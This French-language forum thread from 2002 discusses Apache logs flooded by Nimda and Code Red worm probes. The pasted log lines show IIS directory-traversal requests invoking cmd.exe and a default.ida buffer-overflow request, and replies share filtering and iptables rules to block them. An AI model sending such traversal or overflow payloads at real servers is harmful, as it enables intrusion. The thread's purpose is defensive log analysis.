Voila, pratiquement un quart de l'activité de mon serveur apache consiste en des petits cons qui essayent d'aller sur ../winnt/system32/cmd.exe.
 
Mon error log est quasi exclusivement consacrée a ce type de requete.
 
Ces imbéciles ne sont même pas capables de se rendre compte qu'ils ont affaire a un Linux/Apache et pas a un NT/IIS.
 
J'aimerai bien leur faire une sale blague, genre créer un ../winnt/system32/cmd.exe qui leur foutrait la frousse.
 
Quelqu'un sait il comment s'y prendre ?

Fake ????
 
C'est nimda le petit con en kestion, et lui il s'en fou que ce soit apache, vu qu'il prend une IP au hazard

J'y ai pensé, mais ça m'etonnerai. Ils essayent généralement plusieurs trucs et pas toujours les mêmes. Y'a des variantes
 
ils essayent de remonter sur différents niveaux. et avec des intervalles de plusieurs minutes.
 
Je suis quasi sur que ce sont des nerds.

80.11.163.246 - - [04/Oct/2002:10:26:49 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:26:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:26:57 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:10 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:18 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:24 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.11.163.246 - - [04/Oct/2002:10:27:34 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir H
TTP/1.0" 404 336 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 336 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:17 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:18 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
80.14.41.192 - - [04/Oct/2002:10:43:19 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
61.56.131.38 - - [04/Oct/2002:10:45:08 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u
cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 400 323 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:29 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:30 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:31 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:32 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:33 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:33 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:43 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTT
P/1.0" 404 336 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:47 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:47 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:48 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:48 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
81.48.85.63 - - [04/Oct/2002:13:01:49 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
 
 
 

non, c'est nimda.. ca fait un an que mes logs en sont pleins, tu veux que je te les balances.. c'est humainement impossible de fazire ca a la main

Vi pareil pour moi...
 
Chiantissime quand tu cherches les vraies erreurs.  

j0s3 a écrit a écrit : Vi pareil pour moi...   Chiantissime quand tu cherches les vraies erreurs.

 
y'a des scripts pour epurer les logs remplis d'alerte nimda et autres...  

 
il essaye un buffer overflox là ?

Je croyais que nimda n'infectait que les serveurs IIS.
 
Si il n'y a pas de serveur sur l'addresse IP du demamdeur, c'est que c'est autre chose. Non ?
 
Si tu as raison la quantité de serveurs IIS infectée est colosale. Et M$ dans ce cas est très fort, ils arrivent a m'emmerder quand même avec leurs vulnérabilités. p'tain  

vous en avez de saines lectures    
 
(jesuisdésoeuvrédésolé)

Nimda et Red code, c pas souvent volontaire mais des machines infectées.
 
Mets ça dans ton httpd.conf :
 
SetEnvIf Request_URI "\.exe$" nolog
SetEnvIf Request_URI "\.ida$" nolog
 
CustomLog /rep/acces.log combined env=!nolog
 
 
ça t'évitera ça ( tu peux faire plus évolué pour les expressions regulières si tu veux loguer tes .exe à toi tout de même )

 
Ca c'est Code Red

En parlant de ca il est temps d'upgrader apache les gars
Il y a 2/3 joyeusetes dont une vient d'etre corrigees....

 
C jolie comme expression nan ?  

 
Merci, ça va soigner mon ulcère  

 
Moi j'ai tout fait entre 8h et 9h, je suis tranquille

 
Ca empeche pas de taper a la porte et de demander si y'a pas un IIS derriere hein

Parano a écrit a écrit :     C jolie comme expression nan ?

wé bon overflow koi !

 
Yaisse, mais je pense Nerd si l'addresse demandeuse de la requête n'est pas un serveur oueb.
Si en face ca ne répond pas à une requête http, c'est que c'est ni Nimda, ni Code Red. Mais un des petits cons en question

 
A un moment je loggais à part ce genre de requêtes de merde pour faire des stats. Si tu commences à vouloir tester toutes les IP de ce genre de requêtes, tu vas pouvoir y passer des heures tu sais

 
c'est peut-être un gars qui sait pas configurer convenablement son firewall

 
Je suis motivé    
 
Je leur veut du mal, beaucoup de mal

 
Bah ils ont un IIS pourri qui en plus est verrolé, je vois pas comment ils peuvent se faire plus mal

 
T'as raison, mais bon font chier avec leurs daubes. A un moment l'incompétence rejoint la malveillance.

pour les failles de secu sur apache g opte pour la version 2.0.40 qui est stable depuis 20 jours chez moi sinon y'a un moyen de pas avoir ca dans les log avec une ptite regle iptables si quelqu'un pouvait la mettre ca serait cool de sa part    
 
@++

aurelboiss a écrit a écrit : pour les failles de secu sur apache g opte pour la version 2.0.40 qui est stable depuis 20 jours chez moi sinon y'a un moyen de pas avoir ca dans les log avec une ptite regle iptables si quelqu'un pouvait la mettre ca serait cool de sa part       @++

 
Bah non, parce qu'iptables gère des conditions sur l'IP ou le port ou alors sur les paquets ( taille, type, nombre ). Mais là comme ce sont des requêtes HTTP normales de tas d'IP différentes, tu peux rien faire avec iptables, surtout que ça n'a rien à voir avec le log.
 
La meilleure solution reste donc de les ignorer dans la config apache

iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK,PSH ACK,PSH --dport 80 -m string --string '/default.ida?' -j REJECT --reject-with tcp-reset
 
Ca demande le string match

 
ça marche bien ça ?

Sly Angel a écrit a écrit :     ça marche bien ça ?

 
j'sais pas, j'ai pas testé, mais je me la garde en stock